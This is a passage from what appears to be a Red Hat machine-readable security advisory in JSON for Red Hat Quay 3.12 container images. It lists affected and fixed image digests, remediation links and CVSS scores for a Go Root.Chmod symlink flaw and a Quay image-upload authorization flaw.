            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2456336"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in the internal/syscall/unix package in the Go standard library. If the target of the `Root.Chmod` function is replaced with a symbolic link during execution, specifically after `Root.Chmod` checks the target but before acting, the `chmod` operation will be performed on the file the symbolic link points to. This issue can bypass directory restrictions and lead to unauthorized permission changes on the filesystem.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "golang: internal/syscall/unix: Root.Chmod can follow symlinks out of the root",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "To exploit this issue, an attacker needs access to the system and the required permissions to create a symbolic link. Additionally, the attacker must swap the target file with a symbolic link in the exact window after the `Root.Chmod` function checks its target but before acting. Due to these conditions, this flaw has been rated with a moderate severity.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32282"
        },
        {
          "category": "external",
          "summary": "RHBZ#2456336",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2456336"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32282",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32282"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32282",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32282"
        },
        {
          "category": "external",
          "summary": "https://go.dev/cl/763761",
          "url": "https://go.dev/cl/763761"
        },
        {
          "category": "external",
          "summary": "https://go.dev/issue/78293",
          "url": "https://go.dev/issue/78293"
        },
        {
          "category": "external",
          "summary": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU",
          "url": "https://groups.google.com/g/golang-announce/c/0uYbvbPZRWU"
        },
        {
          "category": "external",
          "summary": "https://pkg.go.dev/vuln/GO-2026-4864",
          "url": "https://pkg.go.dev/vuln/GO-2026-4864"
        }
      ],
      "release_date": "2026-04-08T01:06:55.953000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-06-02T18:16:29+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:22629"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "golang: internal/syscall/unix: Root.Chmod can follow symlinks out of the root"
    },
    {
      "acknowledgments": [
        {
          "names": [
            "Antony Di Scala",
            "Michael Whale"
          ]
        }
      ],
      "cve": "CVE-2026-32589",
      "cwe": {
        "id": "CWE-639",
        "name": "Authorization Bypass Through User-Controlled Key"
      },
      "discovery_date": "2026-03-12T14:43:07.878000+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
            "Red Hat Quay 3.12:registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2446963"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A flaw was found in Red Hat Quay\u0027s container image upload process. An authenticated user with push access to any repository on the registry can interfere with image uploads in progress by other users, including those in repositories they do not have access to. This could allow the attacker to read, modify, or cancel another user\u0027s in-progress image upload.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "mirror-registry: quay: insecure direct object reference in BlobUpload",
          "title": "Vulnerability summary"
        },
        {
          "category": "other",
          "text": "Exploitation requires valid login credentials to the Quay registry. Unauthenticated users cannot exploit this flaw.",
          "title": "Statement"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
          "Red Hat Quay 3.12:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
